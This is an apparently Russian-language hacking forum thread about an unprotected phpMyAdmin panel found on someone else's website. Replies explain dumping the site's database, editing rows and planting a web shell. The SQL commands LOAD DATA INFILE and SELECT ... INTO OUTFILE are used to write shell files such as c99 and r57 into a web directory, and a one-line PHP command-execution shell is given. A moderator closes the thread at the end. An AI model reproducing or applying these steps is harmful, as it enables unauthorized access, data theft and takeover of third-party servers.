не знал куда писать но напигу сюда. кароче есть форум на сайте ну это фигня там другая фигня.. например:я пишу http://xxx.xxx.ru/admin/ он мне сразу зашол [Добро пожаловать в phpMyAdmin 2.4.0 MySQL 4.1.11 на localhost как xxx@localhost] не попросил не каких паролей не чо как нибудь можно скачать БД ?
ну это воще странно что тебя теда впустили без пасов.. повезло) естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит . слева выбирааешь нужные базы и днлаешь дамп (экспорт).
Если ничего не путаю, то надо сделать дамп базы, изменить несколько (или даже одну) строк и залить обратно. Если правильно понял твой вопрос.
блин я в этом phpAdmine не Шарю как там куда захадить то надо ?? там кароче с лева написано БД отсутствуют и есть MySQL Создать новую БД и всякой разной Хрени как залить шел ?? поясните Ньюбу
где выполнять? ну даешь... там в майадмине есть такая ссылка вверху "SQL" жмешь ее потом откроется форма в ней пишешь sql запрос и внизу жмешь кнопку "пошел" или "submit" или чо там у теебя..
WinXP, MySQL 4.1.18-nt, таблица 'lol' c текстовым столбцом 'txt', работаю MySQL Query Browser 1.1.20, админки нет (на целевом) Пасяб virgoz за идею, правда всего так и не понял =) Приступим: Загоняем шелл в таблу: LOAD DATA INFILE 'e:/shell/nst.php' INTO TABLE lol; гуд! 2103 строк записано... Вынимаем на локалхост: SELECT * FROM lol INTO OUTFILE 'd:/http/shell.php'; гуд! 2103 строк записано... Запускаю - белый экран, исходный код - пусто... Сравниваю шеллы: Исходник - 82*940 байт/2103 строк Созданый - 82*547 байт/2156 строк пробую прогнать сие еще 3-4 раза и впадаю в отчаяние... Плз, втолкуйте в чем ошибка, и желательно поскорее, бо на целевом серваке я тож пару раз проверил...
Забыл отписаться: пробовал с99 pre-release 12 и 15 - тот же компот... ставил МиСКЛю 5.0.18 - нифига =( недавно прогнал r57 1.23 и 1.24, и c99 beta 5.02.2005 - ваще выдает кучу строк типа: "Row *** was truncated; it contained more data than there were input columns"
--> там кароче с лева написано. БД отсутствуют. Наверное поэтому ничего не получается. Да, и лить туда 2000 строчек не надо, достаточно этого <?php system($_GET[cmd]);?>.
а Где Это Написать ? если не трудно Скажите где ЭТО выполнять Sql Запросы сылку если можно а то я там не могу найти
В разделе "Уязвимости форумов" не учат пользоваться коммандами скула. PhpMyAdmin сюда отношения не имеет. Тема закрыта.